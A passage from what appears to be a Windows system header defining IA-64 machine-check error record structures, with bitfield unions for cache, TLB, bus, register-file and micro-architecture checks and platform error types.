Architectural 403 | // 404 | // Terminology: 405 | // 406 | // - Target Address: 407 | // 64-bit integer containing the physical address where the data was to be delivered or 408 | // obtained. This could also be the incoming address for external snoops and TLB shoot-downs. 409 | // 410 | // - Requester Identifier: 411 | // 64-bit integer specifying the bus agent that generated the transaction responsible for 412 | // the Machine Check event. 413 | // 414 | // - Responder Identifier: 415 | // 64-bit integer specifying the bus agent that responded to a transaction responsible for 416 | // the Machine Check event. 417 | // 418 | // - Precise Instruction Pointer: 419 | // 64-bit integer specifying the virtual address that points to the IA-64 bundle that 420 | // contained the instruction responsible for the Machine Check event. 421 | // 422 | 423 | #define ERROR_PROCESSOR_GUID \ 424 | { 0xe429faf1, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 425 | 426 | typedef union _ERROR_MODINFO_VALID { 427 | ULONGLONG Valid; 428 | struct { // Bits 429 | ULONGLONG CheckInfo: 1; // 0: 430 | ULONGLONG RequestorIdentifier: 1; // 1: 431 | ULONGLONG ResponderIdentifier: 1; // 2: 432 | ULONGLONG TargetIdentifier: 1; // 3: 433 | ULONGLONG PreciseIP: 1; // 4: 434 | ULONGLONG Reserved: 59; // 5-63: 435 | } DUMMYSTRUCTNAME; 436 | } ERROR_MODINFO_VALID, *PERROR_MODINFO_VALID; 437 | 438 | typedef enum _ERROR_CHECK_IS { 439 | isIA64 = 0, 440 | isIA32 = 1, 441 | } ERROR_CHECK_IS; 442 | 443 | typedef enum _ERROR_CACHE_CHECK_OPERATION { 444 | CacheUnknownOp = 0, 445 | CacheLoad = 1, 446 | CacheStore = 2, 447 | CacheInstructionFetch = 3, 448 | CacheDataPrefetch = 4, 449 | CacheSnoop = 5, 450 | CacheCastOut = 6, 451 | CacheMoveIn = 7, 452 | } ERROR_CACHE_CHECK_OPERATION; 453 | 454 | typedef enum _ERROR_CACHE_CHECK_MESI { 455 | CacheInvalid = 0, 456 | CacheHeldShared = 1, 457 | CacheHeldExclusive = 2, 458 | CacheModified = 3, 459 | } ERROR_CACHE_CHECK_MESI; 460 | 461 | #if (NTDDI_VERSION >= NTDDI_VISTA) 462 | typedef union _ERROR_CACHE_CHECK { 463 | ULONGLONG CacheCheck; 464 | struct 465 | { 466 | ULONGLONG Operation:4; // bits 0- 3: Cache operation 467 | ULONGLONG Level:2; // 4- 5: Cache Level 468 | ULONGLONG Reserved1:2; // 6- 7 469 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line 470 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line 471 | ULONGLONG DataCache:1; // 10 : Failure in data cache 472 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache 473 | ULONGLONG MESI:3; // 12-14: 474 | ULONGLONG MESIValid:1; // 15 : MESI field is valid 475 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache 476 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid 477 | ULONGLONG Reserved2:1; // 22 478 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning 479 | ULONGLONG Reserved3:8; // 24-31 480 | ULONGLONG Index:20; // 32-51: Index of cache line 481 | ULONGLONG Reserved4:2; // 52-53 482 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 483 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 484 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 485 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 486 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 487 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 488 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 489 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 490 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 491 | } DUMMYSTRUCTNAME; 492 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK; 493 | # else 494 | typedef union _ERROR_CACHE_CHECK { 495 | ULONGLONG CacheCheck; 496 | struct 497 | { 498 | ULONGLONG Operation:4; // bits 0- 3: Cache operation 499 | ULONGLONG Level:2; // 4- 5: Cache Level 500 | ULONGLONG Reserved1:2; // 6- 7 501 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line 502 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line 503 | ULONGLONG DataCache:1; // 10 : Failure in data cache 504 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache 505 | ULONGLONG MESI:3; // 12-14: 506 | ULONGLONG MESIValid:1; // 15 : MESI field is valid 507 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache 508 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid 509 | ULONGLONG Reserved2:10; // 22-31 510 | ULONGLONG Index:20; // 32-51: Index of cache line 511 | ULONGLONG Reserved3:2; // 52-53 512 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 513 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 514 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 515 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 516 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 517 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 518 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 519 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 520 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 521 | } DUMMYSTRUCTNAME; 522 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK; 523 | #endif 524 | 525 | typedef enum _ERROR_TLB_CHECK_OPERATION { 526 | TlbUnknownOp = 0, 527 | TlbAccessWithLoad = 1, 528 | TlbAccessWithStore = 2, 529 | TlbAccessWithInstructionFetch = 3, 530 | TlbAccessWithDataPrefetch = 4, 531 | TlbShootDown = 5, 532 | TlbProbe = 6, 533 | TlbVhptFill = 7, 534 | TlbPurge = 8, 535 | } ERROR_TLB_CHECK_OPERATION; 536 | 537 | typedef union _ERROR_TLB_CHECK { 538 | ULONGLONG TlbCheck; 539 | struct 540 | { 541 | ULONGLONG TRSlot:8; // bits 0- 7: Slot number of Translation Register 542 | ULONGLONG TRSlotValid:1; // 8 : TRSlot field is valid 543 | ULONGLONG Reserved1:1; // 9 544 | ULONGLONG Level:2; // 10-11: TLB Level 545 | ULONGLONG Reserved2:4; // 12-15 546 | ULONGLONG DataTransReg:1; // 16 : Error in data translation register 547 | ULONGLONG InstructionTransReg:1; // 17 : Error in instruction translation register 548 | ULONGLONG DataTransCache:1; // 18 : Error in data translation cache 549 | ULONGLONG InstructionTransCache:1; // 19 : Error in instruction translation cache 550 | ULONGLONG Operation:4; // 20-23: Operation 551 | ULONGLONG Reserved3:30; // 24-53 552 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 553 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 554 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 555 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 556 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 557 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 558 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 559 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 560 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 561 | } DUMMYSTRUCTNAME; 562 | } ERROR_TLB_CHECK, *PERROR_TLB_CHECK; 563 | 564 | typedef enum _ERROR_BUS_CHECK_OPERATION { 565 | BusUnknownOp = 0, 566 | BusPartialRead = 1, 567 | BusPartialWrite = 2, 568 | BusFullLineRead = 3, 569 | BusFullLineWrite = 4, 570 | BusWriteBack = 5, 571 | BusSnoopProbe = 6, 572 | BusIncomingPtcG = 7, 573 | BusWriteCoalescing = 8, 574 | } ERROR_BUS_CHECK_OPERATION; 575 | 576 | #if (NTDDI_VERSION >= NTDDI_VISTA) 577 | typedef union _ERROR_BUS_CHECK { 578 | ULONGLONG BusCheck; 579 | struct 580 | { 581 | ULONGLONG Size:5; // bits 0- 4: Transaction size 582 | ULONGLONG Internal:1; // 5 : Internal bus error 583 | ULONGLONG External:1; // 6 : External bus error 584 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer 585 | ULONGLONG Type:8; // 8-15: Transaction type 586 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific 587 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy 588 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning 589 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific 590 | ULONGLONG Reserved1:22; // 32-53 591 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 592 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 593 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 594 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 595 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 596 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 597 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 598 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 599 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 600 | } DUMMYSTRUCTNAME; 601 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK; 602 | #else 603 | typedef union _ERROR_BUS_CHECK { 604 | ULONGLONG BusCheck; 605 | struct 606 | { 607 | ULONGLONG Size:5; // bits 0- 4: Transaction size 608 | ULONGLONG Internal:1; // 5 : Internal bus error 609 | ULONGLONG External:1; // 6 : External bus error 610 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer 611 | ULONGLONG Type:8; // 8-15: Transaction type 612 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific 613 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy 614 | ULONGLONG Reserved1:1; // 23 615 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific 616 | ULONGLONG Reserved2:22; // 32-53 617 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 618 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 619 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 620 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 621 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 622 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 623 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 624 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 625 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 626 | } DUMMYSTRUCTNAME; 627 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK; 628 | #endif 629 | 630 | typedef enum _ERROR_REGFILE_CHECK_IDENTIFIER { 631 | RegFileUnknownId = 0, 632 | GeneralRegisterBank1 = 1, 633 | GeneralRegisterBank0 = 2, 634 | FloatingPointRegister = 3, 635 | BranchRegister = 4, 636 | PredicateRegister = 5, 637 | ApplicationRegister = 6, 638 | ControlRegister = 7, 639 | RegionRegister = 8, 640 | ProtectionKeyRegister = 9, 641 | DataBreakPointRegister = 10, 642 | InstructionBreakPointRegister = 11, 643 | PerformanceMonitorControlRegister = 12, 644 | PerformanceMonitorDataRegister = 13, 645 | } ERROR_REGFILE_CHECK_IDENTIFIER; 646 | 647 | typedef enum _ERROR_REGFILE_CHECK_OPERATION { 648 | RegFileUnknownOp = 0, 649 | RegFileRead = 1, 650 | RegFileWrite = 2, 651 | } ERROR_REGFILE_CHECK_OPERATION; 652 | 653 | typedef union _ERROR_REGFILE_CHECK { 654 | ULONGLONG RegFileCheck; 655 | struct 656 | { 657 | ULONGLONG Identifier:4; // bits 0- 3: Register file identifier 658 | ULONGLONG Operation:4; // 4- 7: Operation that causes the MC event 659 | ULONGLONG RegisterNumber:7; // 8-14: Register number responsible for MC event 660 | ULONGLONG RegisterNumberValid:1; // 15 : Register number field is valid 661 | ULONGLONG Reserved1:38; // 16-53 662 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 663 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 664 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 665 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 666 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 667 | ULONGLONG Reserved2:3; // 60-62 668 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 669 | } DUMMYSTRUCTNAME; 670 | } ERROR_REGFILE_CHECK, *PERROR_REGFILE_CHECK; 671 | 672 | #if (NTDDK_VERSION <= WINXP) 673 | typedef enum _ERROR_MS_CHECK_OPERATION { 674 | MsUnknownOp = 0, 675 | MsReadOrLoad = 1, 676 | MsWriteOrStore = 2 677 | } ERROR_MS_CHECK_OPERATION; 678 | #else 679 | typedef enum _ERROR_MS_CHECK_OPERATION { 680 | MsUnknownOp = 0, 681 | MsReadOrLoad = 1, 682 | MsWriteOrStore = 2, 683 | MsOverTemperature = 3, 684 | MsNormalTemperature = 4 685 | } ERROR_MS_CHECK_OPERATION; 686 | #endif 687 | 688 | typedef union _ERROR_MS_CHECK { 689 | ULONGLONG MsCheck; 690 | struct 691 | { 692 | ULONGLONG StructureIdentifier:5; // bits 0- 4: Structure Identifier - impl. specific 693 | ULONGLONG Level:3; // 5- 7: Structure Level where error was generated 694 | ULONGLONG ArrayId:4; // 8-11: Identification of the array 695 | ULONGLONG Operation:4; // 12-15: Operation 696 | ULONGLONG Way:6; // 16-21: Way where the error was located 697 | ULONGLONG WayValid:1; // 22 : Way field is valid 698 | ULONGLONG IndexValid:1; // 23 : Index field is valid 699 | ULONGLONG Reserved1:8; // 24-31 700 | ULONGLONG Index:8; // 32-39: Index where the error was located 701 | ULONGLONG Reserved2:14; // 40-53 702 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 703 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 704 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 705 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 706 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 707 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 708 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 709 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 710 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 711 | } DUMMYSTRUCTNAME; 712 | } ERROR_MS_CHECK, *PERROR_MS_CHECK; 713 | 714 | typedef union _ERROR_CHECK_INFO { 715 | ULONGLONG CheckInfo; 716 | ERROR_CACHE_CHECK CacheCheck; 717 | ERROR_TLB_CHECK TlbCheck; 718 | ERROR_BUS_CHECK BusCheck; 719 | ERROR_REGFILE_CHECK RegFileCheck; 720 | ERROR_MS_CHECK MsCheck; 721 | } ERROR_CHECK_INFO, *PERROR_CHECK_INFO; 722 | 723 | // SAL Specs July 2000: The size of _ERROR_MODINFO will always be 48 Bytes. 724 | 725 | typedef struct _ERROR_MODINFO { 726 | ERROR_MODINFO_VALID Valid; 727 | ERROR_CHECK_INFO CheckInfo; 728 | ULONGLONG RequestorId; 729 | ULONGLONG ResponderId; 730 | ULONGLONG TargetId; 731 | ULONGLONG PreciseIP; 732 | } ERROR_MODINFO, *PERROR_MODINFO; 733 | 734 | typedef union _ERROR_PROCESSOR_VALID { 735 | ULONGLONG Valid; 736 | struct { // Bits 737 | ULONGLONG ErrorMap: 1; // 0: 738 | ULONGLONG StateParameter: 1; // 1: 739 | ULONGLONG CRLid: 1; // 2: 740 | ULONGLONG StaticStruct:1; // 3: Processor Static Info error. 741 | ULONGLONG CacheCheckNum:4; // 4-7: Cache errors. 742 | ULONGLONG TlbCheckNum:4; // 8-11: Tlb errors. 743 | ULONGLONG BusCheckNum:4; // 12-15: Bus errors. 744 | ULONGLONG RegFileCheckNum:4; // 16-19: Registers file errors. 745 | ULONGLONG MsCheckNum:4; // 20-23: Micro-Architecture errors. 746 | ULONGLONG CpuIdInfo:1; // 24: CPUID Info. 747 | ULONGLONG Reserved:39; // 25-63: Reserved. 748 | } DUMMYSTRUCTNAME; 749 | } ERROR_PROCESSOR_VALID, *PERROR_PROCESSOR_VALID; 750 | 751 | typedef union _ERROR_PROCESSOR_ERROR_MAP { 752 | ULONGLONG ErrorMap; 753 | struct { 754 | ULONGLONG Cid:4; // bits 0- 3: Processor Core Identifier 755 | ULONGLONG Tid:4; // 4- 7: Logical Thread Identifier 756 | ULONGLONG Eic:4; // 8-11: Instruction Caches Level Information 757 | ULONGLONG Edc:4; // 12-15: Data Caches Level Information 758 | ULONGLONG Eit:4; // 16-19: Instruction TLB Level Information 759 | ULONGLONG Edt:4; // 20-23: Data TLB Level Information 760 | ULONGLONG Ebh:4; // 24-27: Processor Bus Level Information 761 | ULONGLONG Erf:4; // 28-31: Register File Level Information 762 | ULONGLONG Ems:16; // 32-47: MicroArchitecture Level Information 763 | ULONGLONG Reserved:16; 764 | } DUMMYSTRUCTNAME; 765 | } ERROR_PROCESSOR_ERROR_MAP, *PERROR_PROCESSOR_ERROR_MAP; 766 | 767 | typedef ERROR_PROCESSOR_ERROR_MAP _ERROR_PROCESSOR_LEVEL_INDEX; 768 | typedef _ERROR_PROCESSOR_LEVEL_INDEX ERROR_PROCESSOR_LEVEL_INDEX, *PERROR_PROCESSOR_LEVEL_INDEX; 769 | 770 | typedef union _ERROR_PROCESSOR_STATE_PARAMETER { 771 | ULONGLONG StateParameter; 772 | struct { 773 | ULONGLONG reserved0:2; // 0-1 : reserved 774 | ULONGLONG rz:1; // 2 : Rendezvous successful 775 | ULONGLONG ra:1; // 3 : Rendezvous attempted 776 | ULONGLONG me:1; // 4 : Distinct Multiple errors 777 | ULONGLONG mn:1; // 5 : Min-state Save Area registered 778 | ULONGLONG sy:1; // 6 : Storage integrity synchronized 779 | ULONGLONG co:1; // 7 : Continuable 780 | ULONGLONG ci:1; // 8 : Machine Check isolated 781 | ULONGLONG us:1; // 9 : Uncontained Storage damage 782 | ULONGLONG hd:1; // 10 : Hardware damage 783 | ULONGLONG tl:1; // 11 : Trap lost 784 | ULONGLONG mi:1; // 12 : More Information 785 | ULONGLONG pi:1; // 13 : Precise Instruction pointer 786 | ULONGLONG pm:1; // 14 : Precise Min-state Save Area 787 | ULONGLONG dy:1; // 15 : Processor Dynamic State valid 788 | ULONGLONG in:1; // 16 : INIT interruption 789 | ULONGLONG rs:1; // 17 : RSE valid 790 | ULONGLONG cm:1; // 18 : Machine Check corrected 791 | ULONGLONG ex:1; // 19 : Machine Check expected 792 | ULONGLONG cr:1; // 20 : Control Registers valid 793 | ULONGLONG pc:1; // 21 : Performance Counters valid 794 | ULONGLONG dr:1; // 22 : Debug Registers valid 795 | ULONGLONG tr:1; // 23 : Translation Registers valid 796 | ULONGLONG rr:1; // 24 : Region Registers valid 797 | ULONGLONG ar:1; // 25 : Application Registers valid 798 | ULONGLONG br:1; // 26 : Branch Registers valid 799 | ULONGLONG pr:1; // 27 : Predicate Registers valid 800 | ULONGLONG fp:1; // 28 : Floating-Point Registers valid 801 | ULONGLONG b1:1; // 29 : Preserved Bank 1 General Registers valid 802 | ULONGLONG b0:1; // 30 : Preserved Bank 0 General Registers valid 803 | ULONGLONG gr:1; // 31 : General Registers valid 804 | ULONGLONG dsize:16; // 47-32 : Processor Dynamic State size 805 | ULONGLONG reserved1:11; // 48-58 : reserved 806 | ULONGLONG cc:1; // 59 : Cache Check 807 | ULONGLONG tc:1; // 60 : TLB Check 808 | ULONGLONG bc:1; // 61 : Bus Check 809 | ULONGLONG rc:1; // 62 : Register File Check 810 | ULONGLONG uc:1; // 63 : Micro-Architectural Check 811 | } DUMMYSTRUCTNAME; 812 | } ERROR_PROCESSOR_STATE_PARAMETER, *PERROR_PROCESSOR_STATE_PARAMETER; 813 | 814 | typedef union _PROCESSOR_LOCAL_ID { 815 | ULONGLONG LocalId; 816 | struct { 817 | ULONGLONG reserved:16; // 0-16 : reserved 818 | ULONGLONG eid:8; // 16-23 : Extended Id 819 | ULONGLONG id:8; // 24-31 : Id 820 | ULONGLONG ignored:32; // 32-63 : ignored 821 | } DUMMYSTRUCTNAME; 822 | } PROCESSOR_LOCAL_ID, *PPROCESSOR_LOCAL_ID; 823 | 824 | typedef struct _ERROR_PROCESSOR_MS { 825 | ULONGLONG MsError [ /* Valid.MsCheckNum */ 1]; // 0 -> 15 registers file errors. 826 | } ERROR_PROCESSOR_MS, *PERROR_PROCESSOR_MS; 827 | 828 | typedef struct _ERROR_PROCESSOR_CPUID_INFO { // Must be 48 bytes. 829 | ULONGLONG CpuId0; 830 | ULONGLONG CpuId1; 831 | ULONGLONG CpuId2; 832 | ULONGLONG CpuId3; 833 | ULONGLONG CpuId4; 834 | ULONGLONG Reserved; 835 | } ERROR_PROCESSOR_CPUID_INFO, *PERROR_PROCESSOR_CPUID_INFO; 836 | 837 | typedef union _ERROR_PROCESSOR_STATIC_INFO_VALID { 838 | ULONGLONG Valid; 839 | struct { // Bits 840 | // Warning: Match the VALID fields with the _ERROR_PROCESSOR_STATIC_INFO members. 841 | // KD extensions use the field names to access the PSI structure. 842 | ULONGLONG MinState: 1; // 0: MinState valid. 843 | ULONGLONG BR: 1; // 1: Branch Registers valid. 844 | ULONGLONG CR: 1; // 2: Control Registers valid. 845 | ULONGLONG AR: 1; // 3: Application Registers valid. 846 | ULONGLONG RR: 1; // 4: Registers valid. 847 | ULONGLONG FR: 1; // 5: Registers valid. 848 | ULONGLONG Reserved: 58; // 6-63: Reserved. 849 | } DUMMYSTRUCTNAME; 850 | } ERROR_PROCESSOR_STATIC_INFO_VALID, *PERROR_PROCESSOR_STATIC_INFO_VALID; 851 | 852 | typedef struct _ERROR_PROCESSOR_STATIC_INFO { 853 | ERROR_PROCESSOR_STATIC_INFO_VALID Valid; 854 | UCHAR MinState[ /* SAL Specs, July 2000 and Jan 2001 state approximatively: */ 1024]; 855 | ULONGLONG BR [ 8 ]; 856 | ULONGLONG CR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ]; 857 | ULONGLONG AR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ]; 858 | ULONGLONG RR [ 8 ]; 859 | ULONGLONG FR [ 2 * 128 ]; 860 | } ERROR_PROCESSOR_STATIC_INFO, *PERROR_PROCESSOR_STATIC_INFO; 861 | 862 | typedef struct _ERROR_PROCESSOR { 863 | ERROR_SECTION_HEADER Header; 864 | ERROR_PROCESSOR_VALID Valid; 865 | ERROR_PROCESSOR_ERROR_MAP ErrorMap; 866 | ERROR_PROCESSOR_STATE_PARAMETER StateParameter; 867 | PROCESSOR_LOCAL_ID CRLid; 868 | #if 0 869 | // The presence of the following data depends on the valid bits 870 | // from ERROR_PROCESSOR.Valid. 871 | // 872 | ERROR_MODINFO CacheErrorInfo [ /* Valid.CacheCheckNum */ ]; // 0->15 cache error modinfo structs. 873 | ERROR_MODINFO TlbErrorInfo [ /* Valid.TlbCheckNum */ ]; // 0->15 tlb error modinfo structs. 874 | ERROR_MODINFO BusErrorInfo [ /* Valid.BusCheckNum */ ]; // 0->15 bus error modinfo structs. 875 | ERROR_MODINFO RegFileCheckInfo [ /* Valid.RegFileCheckNum */ ]; // 0->15 registers file errors. 876 | ERROR_MODINFO MsCheckInfo [ /* Valid.MsCheckNum */ ]; // 0->15 registers file errors. 877 | ERROR_PROCESSOR_CPUID_INFO CpuIdInfo; // field will always be there but could be zero-padded. 878 | ERROR_PROCESSOR_STATIC_INFO StaticInfo; // field will always be there but could be zero-padded. 879 | #endif // 0 880 | } ERROR_PROCESSOR, *PERROR_PROCESSOR; 881 | 882 | // 883 | // IA64 ERROR PROCESSOR State Parameter - GR18 - definitions. 884 | // 885 | 886 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_SHIFT 59 887 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_MASK 0x1 888 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_SHIFT 60 889 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_MASK 0x1 890 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_SHIFT 61 891 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_MASK 0x1 892 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_SHIFT 62 893 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_MASK 0x1 894 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT 63 895 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK 0x1 896 | 897 | // 898 | // For legacy consumers 899 | // 900 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_SHIFT ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT 901 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_MASK ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK 902 | 903 | //////////////////////////////////////////////////////////////////// 904 | // 905 | // IA64 PLATFORM ERRORS Definitions 906 | // 907 | // We tried to respect the order in which these error devices are 908 | // presented in the SAL specs. 909 | 910 | // 911 | // IA64 ERRORS: _ERR_TYPE definitions 912 | // 913 | // Warning 04/01/01: "ERR_TYPE" or "ERROR_TYPE" are already used in the NT namespace. 914 | // 915 | 916 | typedef enum _ERR_TYPES { 917 | // Generic error types: 918 | ERR_INTERNAL = 1, // Error detected internal to the component 919 | ERR_BUS = 16, // Error detected in the bus 920 | // Detailed Internal Error Types: 921 | ERR_MEM = 4, // Storage error in memory (DRAM) 922 | ERR_TLB = 5, // Storage error in TLB 923 | ERR_CACHE = 6, // Storage error in cache 924 | ERR_FUNCTION = 7, // Error in one or more functional units 925 | ERR_SELFTEST = 8, // Component failed self test 926 | ERR_FLOW = 9, // Overflow or Undervalue of internal queue 927 | // Detailed Bus Error Types: 928 | ERR_MAP = 17, // Virtual address not found on IO-TLB or IO-PDIR 929 | ERR_IMPROPER = 18, // Improper access error 930 | ERR_UNIMPL = 19, // Access to a memory address which is not mapped to any component 931 | ERR_LOL = 20, // Loss Of Lockstep 932 | ERR_RESPONSE = 21, // Response to which there is no associated request 933 | ERR_PARITY = 22, // Bus parity error 934 | ERR_PROTOCOL = 23, // Detection of a protocol error 935 | ERR_ERROR = 24, // Detection of PATH_ERROR 936 | ERR_TIMEOUT = 25, // Bus operation time-out 937 | ERR_POISONED = 26, // A read was issued to data which has been poisoned 938 | } _ERR_TYPE; 939 | 940 | // 941 | // IA64 ERRORS: ERROR_STATUS definitions 942 | // 943 | 944 | typedef union _ERROR_STATUS { 945 | ULONGLONG Status; 946 | struct { // Bits: 947 | ULONGLONG Reserved0:8; // 7-0: Reserved 948 | ULONGLONG Type:8; // 15-8: Error Type - See _ERR_TYPE definitions. 949 | ULONGLONG Address:1; // 16: Error was detected on address signals or on address portion of transaction 950 | ULONGLONG Control:1; // 17: Error was detected on control signals or in control portion of transaction 951 | ULONGLONG Data:1; // 18: Error was detected on data signals or in data portion of transaction 952 | ULONGLONG Responder:1; // 19: Error was detected by responder of transaction 953 | ULONGLONG Requestor:1; // 20: Error was detected by requester of transaction 954 | ULONGLONG FirstError:1; // 21: If multiple errors, this is the first error of the highest severity that occurred 955 | ULONGLONG Overflow:1; // 22: Additional errors occurred which were not logged because registers overflow 956 | ULONGLONG Reserved1:41; // 63-23: Reserved 957 | } DUMMYSTRUCTNAME; 958 | } ERROR_STATUS, *PERROR_STATUS; 959 | 960 | // 961 | // IA64 ERRORS: Platform OEM_DATA definitions 962 | // 963 | 964 | typedef struct _ERROR_OEM_DATA { 965 | USHORT Length; 966 | #if 0 967 | UCHAR Data[/* ERROR_OEM_DATA.Length */]; 968 | #endif // 0 969 | } ERROR_OEM_DATA, *PERROR_OEM_DATA; 970 | 971 | // 972 | // IA64 ERRORS: Platform BUS_SPECIFIC_DATA definitions 973 | // 974 | 975 | typedef union _ERROR_BUS_SPECIFIC_DATA { 976 | ULONGLONG BusSpecificData; 977 | struct { // Bits : 978 | ULONGLONG LockAsserted:1; // 0: LOCK# Asserted during request phase 979 | ULONGLONG DeferLogged:1; // 1: Defer phase is logged 980 | ULONGLONG IOQEmpty:1; // 2: IOQ is empty 981 | ULONGLONG DeferredTransaction:1; // 3: Component interface deferred transaction 982 | ULONGLONG RetriedTransaction:1; // 4: Component interface retried transaction 983 | ULONGLONG MemoryClaimedTransaction:1; // 5: memory claimed the transaction 984 | ULONGLONG IOClaimedTransaction:1; // 6: IO controller claimed the transaction 985 | ULONGLONG ResponseParitySignal:1; // 7: Response parity signal 986 | ULONGLONG DeferSignal:1; // 8: DEFER# signal 987 | ULONGLONG HitMSignal:1; // 9: HITM# signal 988 | ULONGLONG HitSignal:1; // 10: HIT# signal 989 | ULONGLONG RequestBusFirstCycle:6; // 